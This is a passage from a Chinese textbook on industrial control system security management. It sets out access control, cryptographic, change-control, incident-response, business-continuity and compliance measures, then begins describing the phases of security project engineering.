网络上的设备标识 应考虑自动设备标识,并将其作为鉴别特定位置和设备连接的方法。 若通信只能从某特定位置或设备处开始,则可使用设备标识。设备内的或贴在设备上 的标识符可用于表示此设备是否允许连接网络。若存在多个网络,尤其是如果这些网络有 不同的敏感度,那么这些标识符要清晰地指明设备允许连接到哪个网络。考虑设备的物理 保护以维护设备标识符的安全可能是必要的。 这些控制措施可补充其他技术以鉴别设备的用户。此外,设备标识可用于用户鉴别。 4. 远程诊断和配置端口的保护 对于物理和逻辑访问诊断与配置端口,应进行控制。 对于诊断和配置端口的访问可采取的控制措施包括使用带钥匙的锁和支持规程。 有些控制系统安装了远程诊断或配置工具,以便维护工程师使用。如果未加保护,则 这些诊断端口提供了一种未授权访问的手段。 如果没有特别的业务需要,那么安装在控制系统设施中的端口、服务和类似设施要禁 用或取消。 5. 网络隔离 应在网络中隔离各组控制系统资产。 控制大型网络安全的一种方法是将该网络分成独立的逻辑网络域,如组织机构的内部 网络域和外部网络域,每个域受到已定义安全周界的保护。不同等级的控制措施集可应用 于不同的逻辑网络域,以进一步隔离网络安全环境。域的定义要基于风险评估和每个域内 的不同安全要求。 6. 网络连接控制 对于共享网络,尤其是越过组织机构边界的网络,用户的联网能力应按照访问控制策 略和业务进行限制。 按照访问控制策略的要求,维护和更新用户的网络访问权。 7. 网络路由控制 在网络中实施路由控制,确保计算机连接和信息流不违反业务应用的访问控制策略。 路由控制措施要基于确定的源地址和目的地址校验机制。 6.8.5 操作系统访问控制 操作系统访问控制的目标是防止对操作系统的未授权访问。 使用安全设施以限制授权用户访问操作系统。这些设施应按照已定义的访问控制策略 鉴别授权用户,应记录成功和失败的系统鉴别企图及专用系统特殊权限的使用,当违背系 统安全策略时发布警报,必要时限制用户的连接时间,以及提供合适的鉴别手段。 1. 安全登录规程 应通过安全登录规程对访问操作系统进行控制。 登录到操作系统的规程要设计成使未授权访问的机会减到最少。因此,登录规程要公 开有关系统的最少信息,以避免给未授权用户提供任何不必要的帮助。 2. 用户标识和鉴别 每个用户应有唯一的、专供其个人使用的标识符,并选择一种适当的鉴别技术证实用 户所宣称的身份。 这种控制措施应用于所有类型的用户,包括技术支持人员、操作员、网络管理员、系 统程序员和数据库管理员。 使用用户 ID 来将各个活动追踪到各个责任人。常规的用户活动不应使用有特殊权限 的账户执行。 3. 口令管理系统 必须采用交互式的口令管理系统,并确保是优质口令。 一个口令管理系统要能够强制使用个人用户 ID 和口令,以保持可核查性;要允许用 户选择和变更他们自己的口令,并且包括一个确认规程;要强制选择优质口令;要强制口 令变更;在第一次登录时强制用户变更临时口令;维护用户以前使用的口令记录,并防止 重复使用;在输入口令时,不在屏幕上显示;要分开存储口令文件和应用系统数据;要以 保护的形式(如加密或哈希运算)存储和传输口令。 口令是确认用户具有访问计算机服务授权的主要手段之一。 在大多数情况下,口令由用户选择和维护。 4. 系统实用工具的使用 应限制并严格控制可能超越系统和应用程序控制措施的实用工具的使用。 对于系统实用工具的使用,应有对系统实用工具使用标识、鉴别和授权的规程;应将 系统实用工具和应用软件分开;应将使用系统实用工具的用户限制到可信的、已授权的最 少实际用户数;应对系统实用工具使用特别的授权;应限制系统实用工具的可用性,如在 授权变更期间内;应对系统实用工具的授权级别进行定义并形成文件;应移去或禁用所有 不必要的基于软件的实用工具和系统软件;当要求责任分割时,禁止访问系统中应用程序 的用户使用系统实用工具;应记录系统实用工具的所有使用。 大多数计算机装有一个或多个可能超越系统和应用控制措施的系统实用工具。 5. 会话超时 在一个设定的休止期后,必须关闭不活动会话。 在一个设定的休止期后,超时设施要清空会话屏幕,并且也可在超时更长时,关闭应 第6章 工业控制系统信息安全管理体系 用和网络会话。超时延迟要反映该范围的安全风险、被处理的信息和被使用的应用程序类 别,以及与设备用户相关的风险。 有些系统可以提供一种受限制的超时设施形式,即清空屏幕并防止未授权访问,但不 关闭应用或网络会话。 这种控制在高风险位置特别重要,包括那些在组织机构安全管理之外的公共或外部区 域。要关闭会话,以防止未授权人员访问和拒绝服务攻击。 6. 联机时间的限制 通过联机时间的限制,为高风险应用程序提供额外的安全。 对敏感的计算机应用程序,特别是安装在高风险位置(如超出组织机构安全管理范围 的公共或外部区域)的应用程序,要考虑使用联机时间的控制措施。 联机时间限制应使用预先定义的时隙,如对批文件传输,或定期的短期交互会话。如 果没有超时或延时操作要求,则将联机时间限于正常办公时间。另外,应考虑定时进行重 新鉴别。 限制与计算机服务连接的允许时间,减少了未授权访问机会。限制活动会话的持续时 间,可以防范用户保持会话打开而阻碍重新鉴别。 6.8.6 应用和信息访问控制 应用和信息访问控制的目标是防止对应用系统中信息的未授权访问。 根据组织机构信息安全方针,安全设施用于限制对应用系统和应用系统内的访问。 对应用软件和信息的逻辑访问应只限于授权用户。应用系统要按照已确定的访问控制 策略,控制用户访问信息和应用系统功能;要提供防范能够超越或绕过系统和应用控制措 施的任何实用工具、操作系统软件和恶意软件的未授权访问;要不损害与之共享信息资源 的其他系统安全。 1. 信息访问的限制 用户和支持人员对应用和信息系统功能的访问,必须依照已确定的访问控制策略进行 限制。 对信息访问的限制,应基于每个用户和支持人员的角色。访问控制策略还应与组织机 构的访问策略保持一致。 2. 敏感系统的隔离 敏感系统应有专用的、隔离的运算环境。 系统的责任人要明确识别系统的敏感程度,并形成文件。同时,责任人要识别并接受 与其共享资产源的应用系统及相关风险。 敏感系统的隔离可通过使用物理或逻辑手段实现。 6.8.7 移动计算和远程工作 移动计算和远程工作的目标是使用移动计算和远程工作设施时确保控制系统的信息 安全。 要求的保护措施应与这些特定工作方式引起的风险相称。 当使用移动计算时,要考虑在不受保护环境中的工作风险,并采取合适的保护措施。 在远程工作的情况下,组织机构要在远程工作地点采用保护措施,并确保对这种工作方式 有合适安排。 1. 移动计算和通信 为了防范使用移动计算和通信设施时所造成的风险,必须有正式策略并采用适当的安 全措施。 使用移动计算和通信设施时要特别小心,确保业务信息不会损害,同时也要考虑在不 受保护的环境下使用移动计算设备工作的风险。 2. 远程工作 应为远程工作活动开发和实施策略、操作计划和规程。 组织机构应仅在有合适的安全部署和控制措施到位且符合组织机构安全方针的情况 下,才授权远程工作活动。 6.9 信息获取、开发与维护 信息获取、开发与维护需要考虑控制系统安全要求、应用中的正确处理、密码控制、 系统文件安全、开发和支持过程中的安全、技术脆弱性管理等。 6.9.1 控制系统安全要求 控制系统安全要求的目标是确保安全是控制系统的一个有机组成部分。 控制系统包括操作系统、基础设施、业务应用、非定制产品、服务和用户开发的应 用。支持业务过程的控制系统的设计和实施对安全来说可能是关键的,在控制系统开发或 实施之前,应识别并商定安全要求。 在项目需求阶段应识别所有安全要求并证明这些安全要求的合理性,对这些安全要求 加以商定,并且将这些安全要求形成文件作为控制系统整体业务情况的一部分。 在新的控制系统或增强已有控制系统的业务要求陈述中,应规定对安全控制措施的 要求。 控制措施要求的说明应考虑将自动控制措施并入信息系统中,以支持人工控制措施的 需要。当评价业务应用的软件包时,已开发或采购软件包,应进行类似考虑。 第6章 工业控制系统信息安全管理体系 安全要求和控制措施要反映出所涉及信息资产的业务价值和可能由于安全故障或安全 措施不足而引起的潜在业务损害。 信息安全的系统要求与实施安全的过程要在控制系统项目的早期阶段集成。在设计阶 段引入控制措施要比在实现期间或实现后引入控制措施实施和维护的费用低得多。 若购买产品,则需要遵循一个正式的测试和获取过程。与供货商签订的合同要给出已 确定的安全要求。如果推荐的产品的安全功能不能满足安全要求,那么在购买产品之前要 重新考虑引入的风险和相应的控制措施。如果产品提供的附加功能引起了安全风险,那么 要禁用该功能,或者要评审所推荐的控制结构,以判定是否可以利用该附加功能。 6.9.2 应用中的正确处理 应用中的正确处理的目标是防止在应用中信息的差错、遗失、未授权修改或误用。 应用系统包括用户开发的应用系统,应设计合适的控制措施以确保正确处理。这些控 制措施包括对输入数据、内部处理和输出数据的确认。 针对处理敏感的、有价值的、关键的信息系统或对这些信息有影响的系统,可以要求 额外的控制措施。这些控制措施要在安全要求和风险评估的基础上加以确定。 1. 输入数据确认 对输入应用系统的数据应进行确认,确保数据是正确且恰当的。 对用于业务交易、常备数据和参数表的输入应进行检查。如适用,为了减小出错的 风险和预防包括缓冲区溢出和代码注入等常见攻击,可以考虑对输入数据进行自动检查 和确认。 2. 内部处理控制 确认核查应合并到应用中,以检验由于处理差错或故意行为造成的信息的任何讹误。 应用的设计与实施应确保导致完整性损坏的处理故障的风险减至最小。 正确输入的数据可能被硬件错误、处理出错或通过故意行为所破坏。所需的确认核查 取决于应用的性质和毁坏数据对业务的影响。 3. 消息完整性 确保消息真实性和保护消息完整性的要求在应用中应进行识别,以及识别并实施适当 的控制措施。 通过安全风险评估,可判定是否需要消息完整性,并确定最合适的实施方法。 密码技术可作为一种合适的实现消息鉴别的手段。 4. 输出数据确认 来自应用系统输出的数据应进行确认,以确保对所存储信息的处理是正确且适于这些 环境的。 输出确认通常包括合理性检查、调节控制计数、为后续处理系统提供足够的信息、响 应输出确认测试的规程、定义数据输出过程中人员的职责、创建过程中活动的日志等。 6.9.3 密码控制 密码控制的目标是通过密码方法保护信息的保密性、真实性或完整性。 应开发使用密码控制的策略,应有密钥管理以支持使用密码技术。 1. 使用密码控制的策略 应开发和实施使用密码控制措施保护信息的策略。 制定密码策略时,应考虑组织机构使用密码控制的管理方法、基于风险评估确定所需 的保护级别、密钥管理方法等。 2. 密钥管理 应有密钥管理,以支持组织机构使用密码技术。 所有的密钥应被保护,免遭修改、丢失和毁坏。此外,秘密密钥和私有密钥要防范非 授权泄露。用于生成、存储和归档密钥的设备应进行物理保护。 密钥管理系统应基于已商定的标准、规程和安全方法。此外,安全管理秘密密钥和私 有密钥还需考虑公开密钥的真实性。 6.9.4 系统文件安全 系统文件安全的目标是确保系统文件的安全。 对系统文件和程序源代码的访问应进行控制。要以安全的方式管理信息系统项目和支 持活动。在测试环境中要小心谨慎以避免泄露敏感数据。 1. 运行软件的控制 在运行的控制系统上安装软件应有规程来控制,使控制系统被破坏的风险减到最小。 在运行的控制系统中所使用的由厂商供应的软件要在供应商支持的级别上进行维护。 经过一段时间后,软件供应商将停止支持旧版本软件。因此,组织机构要考虑依赖于这种 不再支持软件的风险。 升级到新版的任何决策要考虑变更的业务要求和新版本的安全,即引入的新安全功能 或影响该版本安全问题的数量和严重程度。当软件补丁有助于消除或减少安全弱点时,要 使用软件补丁。 必要时在管理层批准的情况下,仅为了技术支持的目的,才授予供应商物理或逻辑访 问权,并对供应商的活动进行监督。 第6章 工业控制系统信息安全管理体系 计算机软件可能依赖于外部提供的软件和模块,要对这些产品进行监视和控制,以避 免可能引入安全弱点的非授权变更。 操作系统应仅在需要升级的时候才进行升级,如在操作系统的当前版本不再支持业务 要求时,只有在具有可用的新版本操作系统后才能进行升级。 2. 系统测试数据的保护 控制系统测试数据应认真地进行选择、保护和控制。 要避免使用包含个人信息或其他敏感信息的运行数据库用于测试。如果测试使用个人 或其他敏感信息,则在使用之前要删除或修改所有的敏感细节和内容。 3. 对程序源代码的访问控制 对程序源代码和相关事项(如设计、说明书、验证计划和确认计划)的访问应严格进 行控制,以防引入非授权功能和避免无意识的变更。对于程序源代码的保存,可以通过这 种代码的中央存储控制来实现,最好是放在源程序库中。 维护和复制源程序库,要严格遵守变更控制规程。 6.9.5 开发和支持过程中的安全 开发和支持过程中的安全目标是维护控制系统和信息的安全。 项目和支持环境应严格控制。负责应用系统的管理人员也应负责项目和环境的安全。 他们要确保评审所有推荐的系统变更,以核查这些变更不会损害系统或操作系统的安全。 1. 变更控制规程 变更的实施应使用正式的变更控制规程来进行控制。 为了将对控制系统的损坏减到最小,应将正式的变更控制规程文件化,并强制实施。 引入新系统和对已有系统进行大的变更要按照从文件、规范、测试、质量控制到实施管理 这个正式的过程进行。 这个过程需要包括风险评估、变更影响分析和所需的安全控制措施规范,以及需要确 保不损害现有的安全和控制规程、确保支持程序员仅能访问系统中那些必要的部分、确保 任何变更均要获得正式商定和批准。 2. 操作系统变更后应用的技术评审 当操作系统发生变更时,包括升级、更新和打补丁,控制系统的应用需要进行评审和 测试,以确保组织机构的运行和安全没有受到负面影响。 3. 软件包变更的限制 软件包的修改应进行劝阻,只限于必要的变更,并且对所有的变更加以严格控制。 若可能且可行,应直接使用厂商提供的软件包,并且不能修改。 若变更是必要的,则应保留原始软件,并将变更应用于已明显确定的复制软件包。 4. 信息泄露 必须防止信息泄露的可能性。 限制信息泄露的风险,要考虑扫描隐藏信息的对外介质和通信;要考虑掩盖和调整系 统及通信的行为,以减小第三方从这些行为中推断信息的可能性;要考虑使用被认为具有 高完整性的系统和软件,如使用经过评价的产品;要考虑在现有法律或法规允许的情况 下,定期监视个人和系统的活动;要考虑监视计算机系统的资源。 5. 外包软件开发 外包软件开发应由组织机构管理和监视。 在外包软件开发时,应考虑许可证安排、代码所有权和知识产权;应考虑工作的质量 和认证;应考虑第三方出现故障的契约安排,审核工作质量和访问权,在安装前检测恶意 代码等。 6.9.6 技术脆弱性管理 技术脆弱性管理的目标是降低利用公布的技术脆弱性导致的风险。 技术脆弱性管理应以一种有效的、系统的、可重复的方式实施,并经测量证实其有效 性。这些考虑事项应包括使用中的操作系统和任何其他在用的应用程序。 控制系统技术脆弱性的信息应及时获得,以评价组织机构对这些脆弱性的暴露程度, 并采取适当的措施来处理相关风险。 有效技术脆弱性管理的先决条件是当前完整的资产清单。支持技术脆弱性管理所需的 特定信息包括软件供应商、版本号、部署的当前状态(如在什么系统上安装什么软件), 以及组织机构内负责软件的人员。 6.10 信息安全事件管理 信息安全事件管理需要考虑报告信息安全事态和弱点、信息安全事件和改进管理等。 6.10.1 报告信息安全事态和弱点 报告信息安全事态和弱点的目标是确保与控制系统有关的信息安全事态和弱点能够以 某种方式传达,以便及时采取纠正措施。 应当具备正式的事态报告和上报规程。所有雇员、承包方人员和第三方人员都要对这 些规程进行培训,以便报告可能对组织机构的资产安全造成影响的不同类型的事态和弱点,并要求他们尽可能快地将信息安全事态和弱点报告给指定的联系点。组织机构应有相 应的规程,以识别成功的和不成功的信息安全违规。 1. 报告信息安全事态 控制系统信息安全事态必须尽快地通过适当的管理渠道进行报告。 应建立正式的信息安全事态报告规程和事件响应及上报规程,在收到信息安全事态报 告时着手采取措施。为了报告信息安全事态,要建立联系点,并确保整个组织机构都知道 该联系点,该联系点一直保持可用并能提供充分且及时的响应。 所有雇员、承包方人员和第三方人员都应经培训并知道他们有责任尽快地报告任何信 息安全事态。他们还应知道报告信息安全事态的规程和联系点。识别事件的细节应形成文 件,以记录本次事件、响应、吸取的教训,以及采取的行动。 2. 报告信息安全弱点 应要求控制系统和服务的所有雇员、承包方人员和第三方人员记录并报告他们观察到 的或怀疑的任何系统或服务的安全弱点。 为了预防信息安全事件,所有雇员、承包方人员和第三方人员应尽快地将这些事情 报告给他们的管理层,或者直接报告给服务提供者。报告机制应尽可能容易、可访问和 可利用。 雇员、承包方人员和第三方人员建议不要试图去证明被怀疑的安全弱点。因为测试弱 点可能被看作是潜在的系统误用,可能导致控制系统或服务的损害,并导致测试人员的法 律责任。 6.10.2 信息安全事件和改进管理 信息安全事件和改进管理的目标是确保采用一致和有效的方法对信息安全事件进行 管理。 组织机构应实施事件响应计划,以识别负责的人员及其采取的行动,同时应有职责和 规程, 一旦信息安全事态和弱点被报告上来,就能有效地处理这些事件。此外,应使用一 个连续的改进过程对信息安全事件进行响应、监视、评价和整体管理。 如果需要证据,则收集证据,并确保符合相关法律要求。 1. 职责和规程 应建立管理职责和规程,确保按照已建立的规程快速、有效和有序地响应信息安全 事件。 除了对信息安全事态和弱点进行报告外,还要利用对系统、报警和脆弱性的监视来检 测信息安全事件。 2. 对信息安全事件的总结 对信息安全事件的总结,要有一套机制能够量化和监视信息安全事件的类型、数量和 代价。 信息安全事件评价中获取的信息,应用于识别再发生的事件或高影响的事件。 3. 证据的收集 若一个信息安全事件涉及民事或刑事诉讼,需要进一步对个人或组织机构进行起诉 时,应收集、保留和呈递证据,以使其符合相关管辖区域对证据的要求。 在组织机构内进行纪律处理措施而收集和提交证据时,应制定和遵循内部规程。 6.11 业务连续性管理 业务连续性管理主要考虑业务连续性管理信息安全方面。 业务连续性管理信息安全方面的目标是防止业务活动中断,保护关键业务过程免受控 制系统重大失误或灾难的影响,并确保及时恢复。 业务连续性管理过程通过使用预防和恢复控制措施,将对组织机构的影响减到最小, 并从信息资产的损失(如自然灾害、意外事件、设备故障和故意行为的结果)中恢复到可 接受的程度,实施业务连续性管理过程。这个过程要确定关键的业务过程,并且将业务 连续性的信息安全管理要求同其他连续性要求如运行、员工、材料、运输和设施等结合 起来。 由灾难、安全失效、服务丢失和服务可用性引起的后果应经受业务影响分析。应制订 和实施业务连续性计划,确保重要的运行能及时恢复。信息安全是整体业务连续性过程和 组织机构内其他管理过程的一个有机组成部分。 业务连续性管理,除了一般的风险评估过程之外,还应包括识别和减小风险的控制措 施,以限制破坏性事件的后果,并确保业务过程需要的信息方便使用。 1. 在业务连续性管理过程中包含信息安全 为贯穿于组织机构的业务连续性,必须开发和保持一个管理过程,解决组织机构的业 务连续性所需的信息安全要求。 这个过程包含业务连续性管理的关键要素:及时理解组织机构所面临的风险,识别关 键业务过程中涉及的所有资产。 由信息安全事件引起的中断可能对业务产生影响,重要的是找到处理产生较小影响的 事件和可能威胁组织机构生存的严重事件的解决方案,并建立控制系统设施的业务目标。 2. 业务连续性和风险评估 事态能引起业务过程中断,因此,应当识别这些事态,连同这种中断发生的概率和影 第6章 工业控制系统信息安全管理体系 响,以及它们对信息安全所造成的后果。 业务连续性的信息安全方面要基于识别可能导致控制系统中断的事态或事态顺序,例 如,设备故障、人为差错、盗窃、火灾、自然灾害和恐怖行为。随后是风险评估,根据时 间、损坏程度和恢复周期,确定中断发生的概率和影响。 业务连续性风险评估应有业务资源和过程责任人的全面参与执行。这种评估考虑所有 业务过程,并不局限于控制系统设施,包括信息安全特有的结果。重要的是,要将不同方 面的风险连接起来,以获得一幅完整的组织机构业务连续性要求的构图。评估要按照组织 机构的相关准则和目标,包括关键资源、中断影响、允许中断时间和恢复的优先级,来识 别、量化并列出风险的优先顺序。 3. 制订和实施包含信息安全的业务连续性计划 必须制定、实施、测试和更新业务连续性计划,以保持或恢复运行,并在关键业务过 程中断或失败后能够在要求的水平和时间内确保控制系统的可用性。 4. 业务连续性计划框架 必须保持业务连续性计划的单一框架,确保所有计划是一致的,能够协调地解决信息 安全要求,并为测试和维护确定优先级。 每个业务连续性计划应说明实现连续性的方法,如确保信息或信息系统可用性和安全 的方法。每个计划还要规定上报计划和激活该计划的条件,以及负责执行该计划每一部分 的人员。当确定新的要求时,现有的应急规程,如撤离计划或退回安排,应做出相应修 正。这些规程应包括在组织机构的变更管理程序中,确保业务连续性事宜总能够得到适当 解决。 每个计划要有一个特定的责任人。应急规程、人工退回计划,以及重新使用计划要属 于相应业务资源或所涉及过程的责任人的职责范围。可替换技术服务的退回安排,如控制 系统和通信设施,通常应是服务提供者的职责。 5. 测试、维护和再评估业务连续性计划 应定期测试和更新业务连续性计划,以确保其及时性和有效性。 业务连续性计划的测试要确保恢复小组中所有成员和其他有关人员了解该计划和他们 对于业务连续性和信息安全的职责,并知道在计划启动后他们的角色。 业务连续性计划的测试计划安排要指出如何和何时测试该计划的每个要素。计划中的 每个要素建议经常测试。 6.12 符 合 性 符合性需要考虑符合性法律要求、符合安全策略和标准及技术符合性、控制系统审计考虑等。 6.12.1 符合性要求 符合性法律要求的目标是避免违反任何法律、法令、法规或合同义务及任何安全 要求。 控制系统的设计、运行、使用和管理都要受到法令、法规,以及合同安全要求的限 制 。 特定的法律要求建议从组织机构的法律顾问或合格的法律从业人员处获得。法律要求 因国家而异,并且对于一个国家所产生的信息发送到另一个国家(即越境的数据流)的法 律要求也不同。 1. 可用法律的识别 对控制系统和组织机构而言,所有相关的法令、法规和合同要求,以及为满足这些要 求组织机构所采用的方法,必须明确定义、形成文件并保持更新。 为了满足这些要求,特定控制措施和人员的职责应类似定义并形成文件。 2. 知识产权 (IPR) 为了确保在使用具有知识产权的材料和具有所有权的软件产品时符合法律、法规和合 同的要求,应实施适当的规程。 3. 保护组织机构的记录 重要的记录应防止遗失、毁坏和伪造,以满足法令、法规、合同和业务的要求。 控制系统记录或分类信息应分为记录类型(如账号记录、数据库记录、事务日志、审 计日志等)和运行规程。每个记录都带有详细的保存周期和存储介质的类型,如纸质、缩 微胶片、磁介质、光介质等。此外,要保存与已加密的归档文件或数字签名相关的任何有 关密钥材料,以使得记录在保存期内能够解密。 4. 数据保护和个人信息的隐私 按照相关法律、法规和合同条款的要求,应确保数据保护和隐私。 应制定和实施组织机构的数据保护和隐私策略。该策略通知到涉及私人信息处理的所 有人员。 符合该策略和所有相关数据保护的法律法规需要合适的管理结构和控制措施。通常, 这一点最好通过任命一个负责人来实现,如数据保护官员,该数据保护官员应向管理人 员、用户和服务提供商提供他们各自的职责,以及应遵守的特定规程的指南。处理个人信 息和确保了解数据保护原则的职责应根据相关法律法规来确定,应实施适当的技术和组织 机构措施以保护个人信息。 目前,许多国家已经具有控制个人数据收集、处理和传输的法律。根据不同的国家法律,这种控制措施可以使那些收集、处理和传播个人信息的人承担责任,并且可以限制将 该数据转移到其他国家。 5. 防止滥用控制系统 应禁止用户使用控制系统用于未授权的目的。 管理层应批准控制系统的使用。在没有管理层批准的情况下,任何出于非业务或未授 权目的使用这些设施,均应看作不正确地使用设施。如果通过监视或其他手段确定了任何 非授权活动,则该活动引起相关管理人员的注意。 在实施监视规程之前,应征求法律建议。 所有用户应知道允许其访问的准确范围和采取监视手段检测非授权使用的准确范围。 这一点可以通过一定的方式实现,给用户一份书面授权,该授权的副本应由用户签字,并 由组织机构加以安全保存。应建议组织机构的雇员、承包方人员和第三方人员,除所授权 的访问外,不允许任何访问。 6. 密码控制措施的规则 使用密码控制措施应遵从相关协议、法律和法规。 为符合相关协议、法律和法规,要考虑限制执行密码功能的计算机硬件和软件的入口 和/或出口;要考虑限制被设计用于增加密码功能的计算机硬件和软件的入口和/或出口; 要考虑限制密码的使用;要考虑利用国家对硬件或软件加密信息的授权的强制或任意访问 方法提供内容的保密性。 通过征求法律建议,确保符合国家法律法规。在将加密信息或密码控制措施转移到其 他国家之前,也要获得法律建议。 6.12.2 安全策略、标准和技术符合性 符合安全策略和标准及技术符合性的目标是确保系统符合组织机构的信息安全策略及 标准。 控制系统的信息安全应进行定期评审。这种评审按照适当的安全策略进行,应审核技 术平台和控制系统,看其是否符合适用的信息安全实施标准和文件的安全控制措施。 1. 符合安全策略和标准 管理人员应确保在其职责范围内的所有安全规程被正确执行,以实现符合安全策略及 标准。 管理人员要对自己职责范围内的控制系统是否符合合适的安全策略、标准和任何其他 安全要求进行定期评审。 如果评审结果发现任何不符合,则管理人员应确定不符合的原因,评价确保不符合不 再发生的需要措施,确定并实施适当的纠正措施,评审所采取的纠正措施。 应记录评审结果和管理人员采取的纠正措施,并且应维护这些记录。当在管理人员的职责范围内进行独立评审时,管理人员应将结果报告给执行独立评审的人员。 2. 技术符合性核查 应定期核查控制系统是否符合信息安全实施标准。 技术符合性核查建议应由有经验的系统工程师手动方式或在自动化工具辅助下实施, 以产生供技术专业人士进行后续解释的技术报告。 若使用渗透测试或脆弱性评估工具,则要格外小心,因为这些活动可能导致系统安全 的损害。这样的测试应预先计划,形成文件,并且可重复执行。 6.12.3 控制系统审计考虑 控制系统审计考虑的目标是将控制系统审计过程中的有效性最大化,干扰最小化。 在控制系统审计期间,应有控制措施防护运行系统和审计工具。 为防护审计工具的完整性和防止滥用审计工具,也要求有保护措施。 1. 控制系统审计控制措施 涉及对运行控制系统核查的审计要求活动,需要谨慎地加以规划并取得批准,以便最 小化造成业务过程中断的风险。 控制系统审计控制措施应与相应的管理层商定审计要求,以及商定和控制审查范围。 审查限于软件和数据的只读访问,非只读访问仅限于系统文件的复制,审计完成时按审计 要求及时删除或保留这些复制,识别和提供审查所需资源、识别和商定特定的处理要求、 监视和记录所有访问。此外,执行审计的人员要独立于被审计的活动。 2. 控制系统审计工具的保护 对于控制系统审计工具的访问应加以保护,以防止任何可能的滥用或损害。 控制系统审计工具,如软件或数据文件,要与开发和运行系统分开,并且不能保存在 磁带或用户区域内,除非给予合适级别的附加保护。 如果审计涉及第三方,则可能存在审计工具被第三方滥用,以及信息被第三方组织机 构访问的风险。因此,应有解决这种风险和后果的控制措施,并采取相应行动。 第 7 章 工业控制系统信息安全项目工程 7.1 项目工程简介 在第5章中我们曾提到,不能把信息安全当作一个有开始日期和结束日期的项目来处 理,但是新建的工业项目包括工业控制系统部分。因此,我们需要按照新建工业项目的要 求和流程,做好新建工业控制系统信息安全建设。 在新建工业项目中,工业控制系统信息安全是项目工程中工业安全的重要组成部分, 其具体工作贯穿于项目工程中的各个阶段。 7.1.1 工业项目工程简介 工业项目工程一般包括规划阶段、工程设计阶段、施工阶段和调试运行阶段。 工程设计阶段的划分一般根据工程规模的大小、技术的复杂程度,以及是否有设计经 验来决定。正常情况下一般分为三个阶段、两个阶段、 一次完成设计三种情况。凡是重大 的工程项目,在技术要求严格、工艺流程复杂、设计又往往缺乏经验的情况下,为了保证 设计质量,设计过程一般分为三个阶段来完成,即初步设计、技术设计和施工图设计三 个阶段。技术成熟的中小型工程,为了简化设计步骤,缩短设计时间,可以分为两个阶 段进行,两个阶段设计又分为两种情况: 一种情况是分为技术设计和施工图设计两个阶 段;另一种情况是将初步设计和技术设计合并为扩大初步设计和施工图设计两个阶段。 技术既简单又成熟的小型工程或个别生产车间可以一次完成设计。此外,对于一些大型 化工联合企业,为了解决总体部署和开发问题,还要进行总体规划设计或总体设计。总 之, 一个具体工程项目的设计阶段如何划分,要看建设管理的要求、工程项目的具体情 况、设计力量的强弱和有无设计经验,就目前来说, 一般采用两个阶段设计,即扩大初步 设计和施工图设计。 7.1.2 工业控制系统信息安全项目工程简介 工业控制系统信息安全随着项目工程的启动而开始,但是不会随着项目的结束而结 束。因为新的威胁和漏洞随着技术的不断改变而出现,网络信息安全风险也在不断发生变 化。因此, 一个典型的工业控制系统信息安全通常包括规划与初步设计阶段、详细设计阶 段、施工调试阶段、运行维护阶段和升级优化阶段,其典型项目阶段示意图如图7-1 所 示。由此可见,在规划与初步设计阶段、详细设计阶段和施工调试阶段,工业控制系统信 息安全项目工程与一般工业项目工程是一致的,相关工作应同期进行并完成。在工业项目工程竣工后,工业项目就宣告结束,而工业控制系统信息安全项目工程并未结束,还需要 经过运行维护阶段和升级优化阶段。因此,工业控制系统信息安全项目工程与一般工业项 目工程有相同阶段,也有不同阶段。 图7-1 典型工业控制系统信息安全项目阶段示意图 图例说明: 信息安全保障检查点 R: 负责(*部分负责) C: 贡献者 框架 高层次评估 详细等级评估 同时也应该看到,工业控制系统信息安全项目工程作为工业项目工程中的重要组成部 分,目前还处于起步和发展阶段。工业项目工程包括如何开展工业控制系统信息安全项目 工程,如何合理设定信息安全保障检查点,如何组织工程公司、系统集成商、控制系统供 应商等相关单位,如何进行工业控制系统信息安全评估等。本章参照目前工业项目惯例进 行分析,目的在于建立比较完善的项目体系,促进工业控制系统信息安全项目工程建设。 7.2 规 划 设 计 规划设计是工业项目工程的第一个阶段。正确理解规划设计,并认真做好规划设计, 是开展项目工程的首要任务。 7.2.1 规划设计简介 规划设计又称为方案设计或概念设计,是投资决策之后,由咨询单位经可行性研究提 出意见和问题,并与业主协商获得认可后提出的具体开展建设的设计文件,其深度应当满 足编制初步设计文件和控制概算的需要。 7.2.2 工业控制系统信息安全规划设计 规划设计阶段的目的是识别系统的业务战略,以支持工业控制系统信息安全需求及安 全战略等。规划设计阶段的评估应能够描绘信息系统建成后对现有业务模式的作用,包括 系统能力、管理等方面,并根据其作用确定系统建设应达到的安全目标。因此,资产所有者应提出工业控制系统信息安全规划框架,并做出工业控制系统信息 安全的概算。 工业控制系统信息安全规划框架应包括以下几个方面: (1)根据相关规则,建立与业务战略相一致的工业控制系统信息安全规划,并获得最 高管理者的认可: (2)明确该系统开发的组织机构、业务变更的管理及开发优先级。 (3)明确该系统开发的威胁、环境,并制定总体的信息安全方针。 (4)描述该系统预期使用的信息,包括预期的应用、信息安全资产的重要性、潜在价 值、可能的使用限制、对业务的支持程度等。 (5)描述所有与该系统信息安全相关的运行环境,包括物理和人员的安全配置,以及 明确相关的法规、组织机构信息安全策略、专业技术和知识等。 工业控制系统信息安全规划框架应体现在工业控制系统规划或项目建议书中。 7.3 初 步 设 计 初步设计是工业项目工程的第二个阶段。准确把握初步设计,并认真做好初步设计, 对项目工程的执行是有帮助的。 7.3.1 初步设计简介 初步设计又称为基础设计,其内容根据项目的类型不同而有所变化。 一般来说,它是 项目的宏观设计,即项目的总体设计、布局设计、主要的工艺流程、设备的选型和安装设 计、土建工程量及费用的估算等。初步设计文件应当满足编制施工招标文件、主要设备材 料订货和编制施工图设计文件的需要,是下一阶段施工图设计的基础。 通常,建设单位或资产所有者选择工程公司或设计院进行初步设计。 7.3.2 工业控制系统信息安全初步设计 初步设计阶段的目的是根据规划阶段所明确的工业控制系统运行环境、系统或资产的 重要性,提出信息安全功能需求。 因此,资产所有者应提出进行工业控制系统信息安全高层次评估,明确信息安全功能 需求,为项目采购提供依据。 在初步设计阶段,建议提供下列文件: (1)初步的工业控制系统架构图。 (2)初步的工业控制设备布置图。 (3)工业控制系统信息安全高层次评估报告。 (4)财产设备、资产、服务、人员等保护等级需求文档。 (5)信息安全方针。 (6)信息安全使命、前景和价值观。 (7)信息安全管理体系。 在初步设计阶段结束时,建议进行第一次信息安全保障检查,进一步确定上述文件已 经准备充分,为后续阶段做准备。 7.4 详 细 设 计 详细设计是工业项目工程的第三个阶段。认真开展详细设计,并及时做好详细设计, 对项目工程的执行是很关键的。 7.4.1 详细设计简介 详细设计又称为施工图设计,其主要内容是根据批准的初步设计,绘制出正确、完整 